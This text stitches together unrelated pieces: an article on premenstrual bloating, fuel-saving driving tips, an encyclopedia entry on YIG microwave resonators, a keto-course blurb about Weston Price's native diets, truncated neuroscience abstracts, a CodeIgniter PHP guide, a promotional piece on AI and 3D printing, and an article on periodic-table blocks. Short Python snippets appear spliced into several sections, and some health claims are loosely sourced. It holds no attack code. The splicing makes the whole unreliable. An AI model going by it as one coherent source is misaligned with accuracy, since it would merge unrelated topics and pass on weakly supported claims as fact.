The term for this is swelling or bloating, a common symptom of premenstrual syndrome (PMS). It can feel like we're swelling everywhere roughly one to two weeks before menses, depending on your personal cycle. While you may certainly feel bloated from head to toe, the most common areas to swell are the breasts, face, abdomen, legs, ankles, and feet. Whether you experience PMS or not, bloating before the period can become a really nasty problem at times. Let's dive into the nature of this process to learn why exactly the swelling happens.

Is it normal?

So, is this extreme discomfort normal? Yes. Not only is it normal to experience bloating from your menstrual cycle; it is estimated that, on average, 8 out of 10 women share this recurrent anguish. Bloating is a common early symptom of menstruation. It may feel like you've gained weight, or like your abdomen or other parts of your body are tight or even swollen. You'll likely experience bloating well before the start of your period: about 5 days before your period, the feeling of bloating increases, and it peaks on the first day of your monthly period. You may bloat every month, once in a while, or not at all. Relief from bloating may occur immediately after you start your period or a few days into it.

The mechanism explained

A lot of the bloating symptoms are caused by water retention, which is increased by hormonal changes associated with the menstrual cycle, doctors explain. So, once again, the short answer is hormones. In the lead-up to menstruation, our levels of sex hormones, progesterone and estrogen, are a bit all over the place. Lowered levels of progesterone are basically what causes our bodies to start bleeding, but these hormone changes are also thought to be the leading reason our stomachs feel so bloated and full around this time.

PMS occurs during the final phase of your menstrual cycle, when the hormones estrogen and progesterone can fluctuate. It's also when the lining of your uterus gets thicker. If you become pregnant, the fertilized egg attaches to your thickened uterine lining; if you're not pregnant, the thickened lining leaves your body and you have a period. At the end of your cycle, when you're about to get your period and haven't become pregnant, progesterone and estrogen levels plummet. About a week before a woman's period starts, levels of the hormone progesterone fall. Research suggests that these changes in progesterone and estrogen levels cause the body to retain more water and salt. The body's cells become swollen with water, causing the feeling of bloating and/or a swollen abdomen; increased blood flow to the uterus can cause uterine swelling, which also contributes to a bloated abdomen. Relief from the feeling of bloating happens immediately after the start of the monthly period or a few days into it: as the period days pass, water retention declines rapidly, your tummy flattens, and the feeling of bloating vanishes.

Not just the hormones

Hormones may not be the only reason you have physical symptoms leading up to your period, experts note. Other causes may relate to your genes, the type and amount of vitamins and minerals you take, your diet, especially if it's high in salt, and the number of drinks and foods you have that contain caffeine or alcohol. Dehydration can also cause water retention before (and sometimes during) your period: when the body needs to keep more fluid, it retains water to counter the dehydration.

A study conducted in 2010 showed that these hormone changes can cause more water and salt retention in the abdomen, meaning that the swollen feeling is actually due to a build-up of fluid and salts rather than the fact that we've just eaten an entire container of Ben & Jerry's. As it turns out, though, it could also be because of that too (grim, we know). Our old friend stress can have an impact on the digestive system, which can often be a symptom of PMS and affect you during your period. It is unsurprising that we tend to reach for carb-rich comfort food during this stage in the cycle, which adds to an already sluggish digestive system. Low levels of serotonin tend to make us want to stuff our faces with things like chocolate, chips, and whatever unhealthy snacks we can find at a gas station at 11 pm. This (you guessed it) makes us bloat.

Mild to moderate bloating that begins before your period and goes away soon after your period starts is generally nothing to worry about. As long as you're able to function normally and your symptoms occur around your period, most likely all you need to do to reduce the symptoms is try some lifestyle modifications. However, if you have more severe bloating that gets in the way of your daily activities, talk to your doctor.
Techniques for Drivers to Conserve Fuel

Drivers can conserve fuel by learning how different driving behaviors affect fuel economy and by adopting techniques to save fuel and money. The amount of fuel your vehicle consumes depends heavily on how you drive. See the information below and FuelEconomy.gov for information about driving efficiently.

Slow Down and Drive Conservatively

Speeding increases fuel consumption and decreases fuel economy as a result of tire rolling resistance and air resistance. While vehicles reach optimal fuel economy at different speeds, gas mileage usually decreases rapidly at speeds above 50 miles per hour (mph). For light-duty vehicles, for example, every 5 mph you drive over 50 mph is like paying $0.30 more per gallon of gas (based on the price of gas at $4.32 per gallon). Reducing your speed by 5 to 10 mph can improve fuel economy by 7%–14%. Using cruise control on the highway can help drivers maintain a constant speed; vehicles use the most energy when accelerating.

Obeying the speed limit, accelerating and braking gently and gradually, and reading the road ahead can improve the fuel economy of your vehicle by 15%–30% at highway speeds and 10%–40% in stop-and-go traffic. Driving more sensibly is also much safer for you and others.

Combine Trips

Combining trips can save you time and money by avoiding unnecessary stopping and starting of your vehicle, which can be an issue in colder climates where it takes longer for your engine to reach its most fuel-efficient temperature. Shorter trips can use twice as much fuel as one long, multi-purpose trip that covers the same distance when the engine is warm and at its most fuel-efficient temperature. Engine and transmission friction increases with cold engine oil and other drive-line fluids, making the engine less efficient. Trip planning can reduce the distance you travel and the amount of time you drive with a cold engine. For information on how cold weather affects fuel economy, see FuelEconomy.gov's Fuel Economy in Cold Weather page.

Reduce Vehicle Load

The additional weight of items left in a vehicle requires more fuel to propel your vehicle. An extra 100 pounds in your trunk, for example, could reduce your fuel economy by about 1%. Hauling rooftop cargo also increases drag, which can reduce fuel economy by 2%–8% in city driving, 6%–17% on the highway, and 10%–25% at 65–75 mph. Offload any unnecessary items to reduce the fuel consumption of your vehicle.

Get Direct Feedback

Drivers may find it difficult to recognize opportunities to conserve fuel while driving. A 2018 study by the National Center for Sustainable Transportation found that instantaneous or in-vehicle feedback affects driver behavior, improves fuel economy by an average of 6.6%, and can result in even greater driving improvements when combined with other strategies, such as driver training or performance-based rewards.

Vehicle manufacturers are increasingly providing instant driver feedback through in-vehicle displays. For example, Honda's ECO Assist and HondaLink features involve a sophisticated feedback system that teaches drivers how to drive more efficiently and what behaviors affect their fuel economy. Similarly, Ford's SmartGauge with EcoGuide feature can help drivers achieve the best fuel efficiency by anticipating future driving situations to help inform the most fuel-efficient driving behaviors. Aftermarket feedback devices are also available.
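As a quick illustration of the rule of thumb quoted above (each 5 mph over 50 mph is like paying about $0.30 more per gallon at $4.32 per gallon), here is a small sketch; the function name and defaults are illustrative only.

def effective_gas_price(speed_mph, pump_price=4.32, penalty_per_5mph=0.30):
    """Approximate 'felt' price per gallon at a given highway speed."""
    over = max(0.0, speed_mph - 50.0)
    return pump_price + penalty_per_5mph * (over / 5.0)

for mph in (50, 60, 70, 80):
    print(mph, "mph ->", round(effective_gas_price(mph), 2), "$/gal")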
YIG sphere
From Wikipedia, the free encyclopedia

[Figure: Simplified schematics of YIG-resonator coupling to a microstrip network]
[Figure: YIG filter, partially disassembled]

Yttrium iron garnet spheres (YIG spheres) serve as magnetically tunable filters and resonators for microwave frequencies. YIG filters are used for their high Q factors, typically between 100 and 200.[1][2]

A sphere made from a single crystal of synthetic yttrium iron garnet acts as a resonator. These spheres are on the order of 0.5 mm in diameter and are manufactured from slightly larger cubes of diced material by tumbling, as is done in the manufacture of jewelry. The garnet is mounted on a ceramic rod, and a pair of small loops around the sphere couple fields into and out of the sphere; the loops are half-turns, positioned at right angles to each other to prevent direct electromagnetic coupling between them, and each is grounded at one end. The field from an electromagnet changes the resonance frequency of the sphere and hence the frequency it will allow to pass.

The advantage of this type of filter is that the garnet can be tuned over a very wide frequency range by varying the strength of the magnetic field; some filters can be tuned from 3 GHz up to 50 GHz. YIG filters usually consist of several coupled stages, each stage consisting of a sphere and a pair of loops. The input and output coils are oriented at right angles to one another around the YIG crystal. They are cross-coupled when energized at the ferrimagnetic resonance frequency, which depends on the external magnetic field supplied by an electromagnet.

YIG filters are often used as preselectors, and YIG filters tuned by a sweep current are used in spectrum analyzers. Another YIG application is YIG oscillators, where the sphere acts as a tunable frequency-determining element; it is coupled to an amplifier which provides the required feedback for oscillation.[3]

References
1. YIG Tuned Filters
2. U.L. Rohde and A.K. Poddar, "Cost-Effective, Power-Efficient and Configurable YIG Replacement Signal Source," German Microwave Conference (GeMiC 2006), 28–30 March 2006, Germany.
3. YIG Tuned Oscillators

Further reading
• Joseph Helszajn (1985). YIG Resonators and Filters. New York: John Wiley & Sons. ISBN 9780608009599.
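The article notes that the applied field sets the sphere's ferrimagnetic resonance. A standard textbook relation (an assumption here, not stated in the article) is f ≈ γH with γ ≈ 2.8 MHz per oersted for YIG; a short sketch:

GAMMA_MHZ_PER_OE = 2.8  # electron gyromagnetic ratio (approximate, assumed)

def yig_resonance_ghz(field_oe: float) -> float:
    """Approximate ferrimagnetic resonance frequency of a YIG sphere."""
    return GAMMA_MHZ_PER_OE * field_oe / 1000.0  # MHz -> GHz

# The 3-50 GHz tuning range quoted above then corresponds to roughly
# 1.1-17.9 kOe of applied field:
for h_oe in (1100, 17900):
    print(h_oe, "Oe ->", round(yig_resonance_ghz(h_oe), 1), "GHz")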
2-1 Dr. Price and Native Diets (start video at 1:50)

The following is a video from my SLIM! Keto Reset Course. It is foundational to understanding REAL health.

Dr. Price was a dentist in the 1930s who believed diet might have a connection to the structure of a person's teeth. He traveled over 300,000 miles to test his hypothesis! He found that indigenous people groups who had never touched "civilization's foods," like white flour, white sugar, and canned or processed foods, had better tooth structure and healthier lives. He also found similarities in their diets, although the diets varied according to where the people lived.

Questions for Reflection (Module 2-1)
• Write in your journal foods from the native diets that you like, would like to try, or have already incorporated into your diet.
Selected abstracts (each truncated in the source):

Autobiographical memory includes the retrieval of personal semantic data and the remembrance of incident or episodic memories. In retrograde amnesias, it has been observed that recall of autobiographical memories of recent events is poorer than recall of remote memories. Alzheimer's disease (AD) may also be associated with a temporal gradient (TG) in memory (More)

Emotional information can be conveyed by various means of communication, such as propositional content, speech intonation, facial expression, and gestures. Prior studies have demonstrated that inputs from one modality can alter perception in another modality. To evaluate the impact of emotional intonation on ratings of emotional faces, a behavioral study (More)

Functional magnetic resonance imaging was used to investigate hemodynamic responses to adjectives pronounced in happy and angry intonations of varying emotional intensity. In separate sessions, participants judged the emotional valence of either intonation or semantics. To disentangle effects of emotional prosodic intensity from confounding acoustic (More)

To detect that a conversational turn is intended to be ironic is a difficult challenge in everyday language comprehension. Most authors have suggested that a theory-of-mind deficit is crucial for irony comprehension deficits in psychiatric disorders like schizophrenia; however, the underlying pathophysiology and neurobiology are unknown, and recent research highlights (More)

One remarkable aspect of the human motor repertoire is the multitude of bimanual actions it contains. Still, the neural correlates of coordinated movements, in which the two hands share a common goal, remain debated. To address this issue, we designed two bimanual circling tasks that differed only in terms of goal conceptualization: a "coordination" task (More)

By using diffusion tensor magnetic resonance imaging (DTI) and subsequent tractography, a perisylvian language network in the human left hemisphere has recently been identified, connecting Broca's and Wernicke's areas directly (arcuate fasciculus) and indirectly by a pathway through the inferior parietal cortex. Applying DTI tractography, the present (More)

BACKGROUND: Memory disturbance is a common symptom of multiple sclerosis (MS), but little is known about autobiographical memory deficits in the long-term course of different MS subtypes. Inflammatory activity and demyelination are pronounced in relapsing-remitting multiple sclerosis (RRMS), whereas, similar to Alzheimer's disease, neurodegeneration affecting (More)

The present functional magnetic resonance imaging (fMRI) study investigated human brain regions subserving the discrimination of vibrotactile frequency. An event-related adaptation paradigm was used in which blood-oxygen-level-dependent (BOLD) responses are lower to same compared with different pairs of stimuli (BOLD adaptation). This adaptation effect (More)

Successful behavior requires contextual modulation of learned "programs", that is, the retrieval or non-retrieval (inhibition) of behavioral elements depending on situative context. Here we report neural correlates of these elementary aspects of behavior as identified with functional magnetic resonance imaging (fMRI). Inhibition of a "ready-to-go" behavioral (More)

Although second-generation antipsychotics are established as the first-line treatment for schizophrenia, female patients are often excluded from this efficient treatment for safety reasons in pregnancy or whilst breastfeeding. For this reason, research on this subject mostly relies on case reports, although there is a great need to establish modern (More)
CodeIgniter (CI) Quick-Start Handbook, compiled by Xu Duowei (original)

Official site: https://codeigniter.com/
Chinese site: http://codeigniter.org.cn/

URL style 1: index.php/welcome/abc/?id=6
- welcome: controller name (default: welcome)
- abc: method name (default: index)
- id: a parameter passed to the controller, such as an ID or any other variable.

For index.php/welcome/abc/?id=6, read GET values with $this->input->get(), which returns the GET parameters as an array. For POST requests, use $this->input->post().

URL style 2: example.com/index.php?c=controller&m=function, e.g. index.php?c=welcome&m=abc.
Note: the method parameter defaults to m and can be changed. In application/config/config.php, set enable_query_strings to TRUE, then change the trigger:

$config['function_trigger'] = 'm'; // rename the method parameter

Tip: you can create subdirectories under application/controllers, e.g. index and admin, to simulate the "modules" of ThinkPHP. In pathinfo mode they are reached as index.php/<directory>/<controller>/<method>. CI URLs use either plain query-string mode or pathinfo mode (the latter is recommended); only one is supported at a time.

Rendering a view:

$this->load->view('welcome_message'); // loads views/welcome_message.php (default suffix: .php)

Assigning variables to views:

// Example 1 (controller):
$this->load->vars("xdw", array('a' => '1', 'b' => 2, 'c' => 3));
$this->load->view('abc/hi');
// In the view:
<?php print_r($xdw); ?>

// Example 2 (controller):
$this->load->view('abc/hi', array('xdw' => array('a' => '1', 'b' => 2, 'c' => 3)));
// In the view:
<?php print_r($xdw); ?>

Using custom functions in views (handy for extending functionality):
1. Create a common_helper.php file under system/helpers.
2. Load it in the controller: $this->load->helper('common'); // note: 'common', not 'common_helper' (the framework resolves the suffix automatically)
3. The custom functions can then be called directly in views.

Tip: to autoload helpers, find the helper entry in application/config/autoload.php:
$autoload['helper'] = array('common');

Including JS and CSS files in CI views: echo base_url(); returns the project's base URL. Remember that the url helper must be loaded first, in one of two ways:
1. Manually: $this->load->helper('url');
2. Automatically: in application/config/autoload.php, set $autoload['helper'] = array('common', 'url');

Form submission paths: with the url helper loaded (it must not be missing; it can also be configured in autoload.php), use site_url('controller/method') or site_url('directory/controller/method').

Database create, read, update, delete

1. Make sure the settings in application/config/database.php are correct.
2. Query:

$this->load->database();
$rst = $this->db->query("select * from obj_users");
$rs = $rst->result_array(); // one of several result formats
foreach ($rs as $k) {
    echo $k['username'] . "<br/>";
}

Tip: $rst->result_array() converts the abstract result set into an array (access fields as $k['username']); $rst->result() converts it into objects (access fields as $k->username).

Configuring a swappable table prefix:

$db['default']['dbprefix'] = 'obj_';
$db['default']['swap_pre'] = 'my_';

Write SQL with the my_ prefix and CI automatically swaps my_ for obj_; dbprefix can then be changed freely, which makes renaming the database prefix convenient. For example:

$sql = "SELECT * FROM my_users";
$rst = $this->db->query($sql);

Query-builder style:

$rst = $this->db->get('table_name');
$this->db->where("id=1");
$rst = $this->db->select("username")->get("users");

Delete:

$this->load->database();
$num = $this->db->where("id=14")->delete('users'); // returns a boolean true/false

Update:

$this->load->database();
$num = $this->db->where("id=13")->update('users', array("username" => 'xdw'));
var_dump($num); // boolean

Insert:

$this->load->database();
$num = $this->db->insert('users', array("username" => 'xdw666'));
var_dump($num); // boolean

Loading models

Manually (must not be omitted when loading a specific model):

$this->load->model("M_welcome"); // case-insensitive; capitalizing the first letter matches the model class name and is recommended
$m = new M_welcome();
$rs = $m->abc();
var_dump($rs);

To load a model from a subdirectory: $this->load->model("model_folder_name/M_welcome");

Model names should be distinguishable from controller names; a common convention is the M_ prefix. A model file looks like:

class M_index extends CI_Model { // extending CI_Model must not be omitted, otherwise an error is raised
    // ...
}

Autoloading models: in config/autoload.php,
$autoload['model'] = array('M_welcome'); // m_welcome also works; capitalized is recommended for consistency with the model name

You can also autoload the database class in autoload.php, so that $this->load->database() can be omitted when working with the database:
$autoload['libraries'] = array('database');

Sessions

The session class must be loaded before use, in one of two ways.

Globally, in config/autoload.php:
$autoload['libraries'] = array("session");

Or per page/controller:
function __construct() {
    parent::__construct(); // must not be omitted
    $this->load->library('session');
}

Usage, style 1:
$_SESSION['name'] = $value; // set
$_SESSION['name'];          // get

Usage, style 2:
$this->session->name = $value; // set
$this->session->name;          // get

Getting the directory, controller, and method names in CI:

$directory = $this->router->fetch_directory(); // directory name
$class = $this->router->fetch_class();         // controller name
$method = $this->router->fetch_method();       // method name

Tip: to simulate ThinkPHP-style shared base-class inheritance in CI, use a pattern like:

@include_once(APPPATH . 'controllers/admin/Common.php');
class Welcome extends Common {
    // ...
}

where Common.php contains:

class Common extends CI_Controller {
    // ...
}

Explanation: CI automatically includes CI_Controller, but it does not automatically include other classes, so other base-class files must be included manually with include_once.

Also worth a look: the Yii framework.
https://www.yiiframework.com/
https://www.yiichina.com/
How does AI and 3D printing relate? How does AI and 3D printing relate? Share the Post: Quick Answer: How Does AI and 3D Printing Relate? In today’s technological landscape, artificial intelligence (AI) and 3D printing are two of the most exciting areas of development. Both have the potential to revolutionize the way we live and work, and their relationship is crucial to unlocking their full potential. In this article, we’ll explore the relationship between AI and 3D printing, their definitions, brief history, and applications. We’ll also examine the advantages of using AI and 3D printing together, potential future developments, and their impact on various industries. AI and 3D Printing: What Are They? AI refers to the ability of machines to learn and perform tasks that typically require human intelligence, such as recognizing speech or making decisions. 3D printing, on the other hand, is the process of creating three-dimensional objects from a digital model. The technology involves layering materials until the desired shape is formed. AI has been in development since the 1950s, and 3D printing since the 1980s. Both were initially used in specialized fields such as aerospace and medicine. However, in recent years, their use has expanded to a wide range of industries, including automotive, architecture, fashion, and entertainment. The Relationship between AI and 3D Printing AI and 3D printing work together in various ways. For instance, AI can be used to optimize the design of 3D models, making them more efficient and cost-effective. AI can also be used to analyze data from 3D printing sensors, improving the accuracy and precision of the printing process. Examples of AI and 3D printing applications include the use of AI algorithms to optimize the design of prosthetic limbs and the use of 3D printing to create customized hearing aids. In the automotive industry, AI and 3D printing are used to create lightweight parts that improve fuel efficiency. Advantages of Using AI and 3D Printing Together The combination of AI and 3D printing offers several advantages. Firstly, it is cost-effective and efficient. The use of AI in the design process reduces the need for costly and time-consuming iterations. Secondly, it improves accuracy and precision. The use of AI algorithms in the printing process ensures that the final product meets the desired specifications. Thirdly, it increases speed and customization. The use of 3D printing allows for rapid prototyping and customization of products, while AI speeds up the design process. Potential Future Developments AI and 3D printing technology are rapidly evolving, and there are many potential future developments. For example, AI algorithms could be used to optimize the printing process in real-time, improving efficiency and reducing waste. 3D printing technology could be used to create larger, more complex objects, such as buildings and infrastructure. Conclusion In conclusion, understanding the relationship between AI and 3D printing is crucial for unlocking their full potential. The combination of these technologies offers numerous advantages, including cost-effectiveness, efficiency, accuracy, precision, speed, and customization. As these technologies continue to evolve, we can expect to see even more innovation and growth in various industries. Related Posts Contents Get More Answers, Faster! Stay ahead with our newsletter: swift insights on Web3 and the Creator Economy, plus a free exclusive E-book. Join now! 
Block (periodic table)

A block of the periodic table of elements is a set of adjacent groups. The term appears to have been first used by Charles Janet.[1] The respective highest-energy electrons in each element in a block belong to the same atomic orbital type. Each block is named after its characteristic orbital; thus, the blocks are:

• s-block
• p-block
• d-block
• f-block
• g-block (hypothetical)

The block names (s, p, d, f and g) are derived from the spectroscopic notation for the associated atomic orbitals: sharp, principal, diffuse and fundamental, and then g, which simply follows f in the alphabet.

The following is the order in which the subshell orbitals are filled according to the Aufbau principle, which also gives the linear order of the blocks (as atomic number increases) in the periodic table:

1s, 2s, 2p, 3s, 3p, 4s, 3d, 4p, 5s, 4d, 5p, 6s, 4f, 5d, 6p, 7s, 5f, 6d, 7p, ...

For a discussion of why the energies of the blocks naturally appear in this order in complex atoms, see atomic orbital and electron configuration.

The "periodic" nature of the filling of orbitals, and the emergence of the s, p, d and f blocks, is more obvious if this filling order is given in matrix form, with increasing principal quantum numbers starting the new rows ("periods") of the matrix. Each subshell (defined by the first two quantum numbers) is repeated as many times as required for each pair of electrons it may contain. The result is a compressed periodic table, with each entry representing two successive elements:

Blocks in the periodic table
1s
2s 2p 2p 2p
3s 3p 3p 3p
4s 3d 3d 3d 3d 3d 4p 4p 4p
5s 4d 4d 4d 4d 4d 5p 5p 5p
6s 4f 4f 4f 4f 4f 4f 4f 5d 5d 5d 5d 5d 6p 6p 6p
7s 5f 5f 5f 5f 5f 5f 5f 6d 6d 6d 6d 6d 7p 7p 7p

Periodic table

There is an approximate correspondence between this nomenclature of blocks, based on electronic configuration, and groupings of elements based on chemical properties. The s-block and p-block together are usually considered the main-group elements, the d-block corresponds to the transition metals, and the f-block covers the lanthanides and the actinides. However, not everyone agrees on the exact membership of each set of elements, so that, for example, the group 12 elements Zn, Cd and Hg are considered main group by some scientists and transition metals by others, because they are chemically and physically more similar to the p-block elements than to the other d-block elements. Furthermore, the group 3 elements and the f-block are sometimes also considered main-group elements due to their similarities to the s-block elements. Groups (columns) in the f-block (between groups 3 and 4) are not numbered.

Helium is coloured differently from the p-block elements surrounding it because it is in the s-block, with its outer (and only) electrons in the 1s atomic orbital, although its chemical properties are more similar to those of the p-block noble gases due to its full shell. In addition to the blocks listed in this table, there is a hypothetical g-block which is not pictured here. The g-block elements can be seen in the expanded extended periodic table.
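The filling order above can be generated mechanically from the Madelung rule: subshells fill in order of increasing n + l, with ties broken by lower n. The sketch below (Python, an idealized model only) derives the order and the block of a given element from it; note that real configurations deviate for some elements, as discussed in the next section for lanthanum and actinium.

L_LABELS = "spdfg"

def filling_order(max_n=8):
    """Subshells sorted by n + l, ties broken by lower n (Madelung rule)."""
    subshells = [(n, l) for n in range(1, max_n + 1) for l in range(0, n)]
    return sorted(subshells, key=lambda nl: (nl[0] + nl[1], nl[0]))

def block(atomic_number):
    """Block letter of the subshell that receives the last electron."""
    remaining = atomic_number
    for n, l in filling_order():
        capacity = 2 * (2 * l + 1)   # each orbital holds one pair of electrons
        if remaining <= capacity:
            return L_LABELS[l]
        remaining -= capacity
    raise ValueError("atomic number out of range for this table")

print(block(26))   # iron -> 'd' (3d subshell)
print(block(57))   # lanthanum -> 'f' in this idealized model, although its
                   # real configuration (5d1 6s2) places it in the d-block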
Also, lanthanum and actinium are placed under scandium and yttrium to reflect their status as d-block elements, as they have no electrons in the 4f and 5f orbitals, respectively, while lutetium and lawrencium do.[2]

Groups 1–18 (s-block: 1–2; d-block: 3–12; p-block: 13–18):

Period 1:  1 H | 2 He
Period 2:  3 Li, 4 Be | 5 B, 6 C, 7 N, 8 O, 9 F, 10 Ne
Period 3:  11 Na, 12 Mg | 13 Al, 14 Si, 15 P, 16 S, 17 Cl, 18 Ar
Period 4:  19 K, 20 Ca | 21 Sc, 22 Ti, 23 V, 24 Cr, 25 Mn, 26 Fe, 27 Co, 28 Ni, 29 Cu, 30 Zn | 31 Ga, 32 Ge, 33 As, 34 Se, 35 Br, 36 Kr
Period 5:  37 Rb, 38 Sr | 39 Y, 40 Zr, 41 Nb, 42 Mo, 43 Tc, 44 Ru, 45 Rh, 46 Pd, 47 Ag, 48 Cd | 49 In, 50 Sn, 51 Sb, 52 Te, 53 I, 54 Xe
Period 6:  55 Cs, 56 Ba | 57 La, * 72 Hf, 73 Ta, 74 W, 75 Re, 76 Os, 77 Ir, 78 Pt, 79 Au, 80 Hg | 81 Tl, 82 Pb, 83 Bi, 84 Po, 85 At, 86 Rn
Period 7:  87 Fr, 88 Ra | 89 Ac, * 104 Rf, 105 Db, 106 Sg, 107 Bh, 108 Hs, 109 Mt, 110 Ds, 111 Rg, 112 Cn | 113 Nh, 114 Fl, 115 Mc, 116 Lv, 117 Ts, 118 Og
*  Lanthanides (period 6): 58 Ce, 59 Pr, 60 Nd, 61 Pm, 62 Sm, 63 Eu, 64 Gd, 65 Tb, 66 Dy, 67 Ho, 68 Er, 69 Tm, 70 Yb, 71 Lu
*  Actinides (period 7): 90 Th, 91 Pa, 92 U, 93 Np, 94 Pu, 95 Am, 96 Cm, 97 Bk, 98 Cf, 99 Es, 100 Fm, 101 Md, 102 No, 103 Lr

s-block

The s-block is on the left side of the periodic table and includes elements from the first two columns, the alkali metals (group 1) and alkaline earth metals (group 2), plus helium. Helium's placement is debated: it could be placed in group 2 of the s-block, but most scientists place it at the top of group 18, above neon (atomic number 10), since it shares many properties with the group 18 elements.

Most s-block elements are highly reactive metals, owing to the ease with which their outer s-orbital electrons interact to form compounds. The first-period elements in this block, however, are nonmetals: hydrogen is highly chemically reactive, like the other s-block elements, but helium is a virtually unreactive noble gas.

S-block elements are unified by the fact that their valence (outermost) electrons are in the s orbital. The s orbital is a single spherical cloud which can contain only one pair of electrons; hence, the s-block consists of only two columns of the periodic table. Elements in column 1, with a single s-orbital valence electron, are the most reactive of the block. Elements in the second column have two s-orbital valence electrons and, except for helium, are only slightly less reactive.

p-block

The p-block is on the right side of the periodic table and includes elements from the six columns beginning with column 13 and ending with column 18. Helium, though at the top of group 18, is not included in the p-block. The p-block is home to the greatest variety of elements and is the only block that contains all three types of element: metals, nonmetals, and metalloids. Generally, the p-block elements are best described in terms of element type or group.

P-block elements are unified by the fact that their valence (outermost) electrons are in the p orbital. The three p orbitals of a shell together form six lobes radiating from a central point at evenly spaced angles and can hold a maximum of six electrons; hence, there are six columns in the p-block. Elements in column 13, the first column of the p-block, have one p-orbital electron. Elements in column 14, the second column of the p-block, have two p-orbital electrons. The trend continues this way until we reach column 18, which has six p-orbital electrons. (An idealized valence-electron count for these columns is sketched below.)
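Since main-group membership and valence count line up with the column number in this scheme, the counts just described can be captured in a few lines. A small Python sketch (idealized; helium, with only two electrons, is the noted exception in group 18):

def valence_electrons(group):
    """Idealized valence-electron count for main-group columns."""
    if group in (1, 2):            # s-block: one or two s electrons
        return group
    if 13 <= group <= 18:          # p-block: two s electrons plus (group - 12) p electrons
        return group - 10
    raise ValueError("transition-metal groups 3-12 are not handled here")

assert valence_electrons(1) == 1    # alkali metals
assert valence_electrons(14) == 4   # carbon group
assert valence_electrons(17) == 7   # halogens: one electron short of a full shell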
Metals

P-block metals have classic metal characteristics: they are shiny, they are good conductors of heat and electricity, and they lose electrons easily. Generally, these metals have high melting points and readily react with nonmetals to form ionic compounds, which form when a positive metal ion bonds with a negative nonmetal ion.

Several of the p-block metals have fascinating properties. Gallium, in the third row of column 13, is a metal that can melt in the palm of a hand. Tin, in the fourth row of column 14, is an abundant, flexible, and extremely useful metal and an important component of many metal alloys such as bronze, solder, and pewter. Sitting right beneath tin is lead, a toxic metal. Ancient people used lead for a variety of things, from food sweeteners to pottery glazes to eating utensils. It has been suspected that lead poisoning is related to the fall of Roman civilization,[3] but further research has shown this to be unlikely.[4][5] For a long time, lead was used in the manufacture of paints; only within the last century has lead paint been restricted due to its toxic nature.

Metalloids

Metalloids have properties of both metals and nonmetals, but the term 'metalloid' lacks a strict definition. All of the elements commonly recognized as metalloids are in the p-block: boron, silicon, germanium, arsenic, antimony, and tellurium. Metalloids tend to have lower electrical conductivity than metals, yet often higher than nonmetals. They tend to form chemical bonds similarly to nonmetals, but may dissolve in metallic alloys without covalent or ionic bonding. Metalloid additives can improve the properties of metallic alloys, sometimes in ways at odds with their own apparent properties: some give the alloy better electrical conductivity, higher corrosion resistance, ductility, or fluidity in the molten state.

Boron has many carbon-like properties but is very rare. It has many uses, for example as a p-type semiconductor dopant. Silicon is perhaps the most famous metalloid. It is the second most abundant element in Earth's crust and one of the main ingredients in glass. It is used to make semiconductor circuits, from large power switches and high-current diodes to microchips for computers and other electronic devices. It is also used in certain metallic alloys, e.g. to improve the casting properties of aluminium. So valuable is silicon to the technology industry that Silicon Valley in California is named after it. Germanium has properties very similar to silicon, yet is much rarer. It was once used for its semiconductor properties much as silicon is now, and in some respects it is superior, but it is now a rare material in the industry. Arsenic is a toxic metalloid that has been used throughout history as an additive to metal alloys, paints, and even makeup. Antimony is used as a constituent in casting alloys such as printing metal.

Elements not always considered metalloids include:

• Carbon, in the same column as silicon and germanium; it is electrically fairly conductive, unlike most other nonmetals, and is to an extent preferred as a trace constituent in certain metallic alloys such as steel
• Phosphorus, which has metallurgical uses among others, e.g.
as a constituent of some copper alloys
• Selenium, once used as a semiconductor material, and also used to improve the properties of metallic alloys
• Aluminium, generally considered a metal, but with some metalloid/nonmetal properties such as negative oxidation states
• Polonium

Noble gases

Previously called the inert gases, their name was changed because a few other gases are inert but are not noble gases, such as nitrogen. The noble gases are located in the far right column of the periodic table, also known as group zero or group eighteen. Noble gases are sometimes also called aerogens, but this name for the group is not officially accepted by IUPAC. All of the noble gases have full outer shells with eight electrons; the exception is helium, at the top of the group, whose only shell is full with just two electrons. Because their outer shells are full, they rarely react with other elements, which led to their original title of "inert". Because of these chemical properties, the gases are also used in the laboratory to help stabilize reactions that would usually proceed too quickly.

As the atomic numbers increase, the elements become rarer, both in nature and in practical use.

• Helium is best known for its low density, used to safely produce buoyancy for zeppelins and balloons
• Neon is familiar as the red-to-yellow glow medium of old low-power signal lamps and signs
• Argon is used as a protective gas in MIG and TIG welding
• Xenon is used as a plasma medium in high-intensity arc lamps with tungsten electrodes. Automotive "xenon" lights, however, are mostly mercury-vapor bulbs with low-pressure xenon to help strike the arc and produce light instantly.
• Krypton has many uses, such as an arc flash medium. Krypton-filled incandescent bulbs were once the most efficient variety, before being replaced by halogen technology.
• Radon is radioactive, and one of the densest elements that remains gaseous at room temperature

Halogens

The second column from the right side of the periodic table, group 17, is the halogen family of elements. These elements are all just one electron short of having full shells. Because they are so close to being full, they tend to combine with many different elements and are very reactive. They are often found bonding with metals and with elements from group 1, since those elements each have one valence electron to give. Not all halogens react with the same intensity: fluorine is the most reactive and combines with most elements from around the periodic table, and as in other columns, reactivity decreases as the atomic number increases. When a halogen combines with another element, the resulting compound is called a halide. One of the best-known examples of a halide is sodium chloride (NaCl).

d-block

The d-block is in the middle of the periodic table and includes elements from columns 3 through 12. These elements are also known as the transition metals because their properties are transitional: the d orbitals fill between the s and p orbitals in energy, and the elements show a gradation in properties between the s-block and the p-block. The d-block elements are all metals that exhibit two or more ways of forming chemical bonds. Because there is a relatively small difference in the energy of the different d-orbital electrons, the number of electrons participating in chemical bonding can vary.
This results in the same element exhibiting two or more oxidation states, which determine the type and number of its nearest neighbours in chemical compounds. D-block elements are unified by having one or more d-orbital electrons, but no p-orbital electrons, among their outermost electrons. The d orbitals can contain up to five pairs of electrons; hence, the block includes ten columns of the periodic table.

f-block

The f-block is in the centre-left of a 32-column periodic table but in the footnoted appendage of 18-column tables. These elements are not generally considered part of any group. They are often called the inner transition metals because they provide a transition between the s-block and d-block in the 6th and 7th rows (periods), in the same way that the d-block transition metals provide a transitional bridge between the s-block and p-block in the 4th and 5th rows.

